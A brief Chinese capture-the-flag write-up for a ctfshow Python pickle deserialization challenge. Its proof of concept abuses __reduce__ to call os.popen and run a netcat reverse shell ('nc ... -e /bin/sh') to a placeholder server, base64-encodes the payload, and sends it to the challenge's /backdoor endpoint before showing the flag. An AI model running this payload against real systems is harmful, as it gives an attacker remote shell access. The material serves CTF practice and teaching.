Werkzeug/1.0.1Python/3.7.9pickle 反序列化

    和 web277 差不多,只不过过滤了 system,换个函数即可

    poc

    1. import base64
    2. import pickle
    3. import requests
    5. class Exp():
    6.     def __reduce__(self):
    7.         return(__import__("os").popen, ('nc 服务器ip 服务器端口 -e /bin/sh',))
    9. exp = Exp()
    10. s = pickle.dumps(exp)
    11. s_base64 = base64.b64encode(s)
    13. url = 'http://e281b968-e161-414c-bd80-c7a79045351e.challenge.ctf.show:8080/backdoor'
    14. params={
    15.     'data': s_base64
    16. }
    18. requests.get(url, params)

    image.png
    flag
    ctfshow{bebaefdd-04a9-476e-a3c6-9d3daacd0770}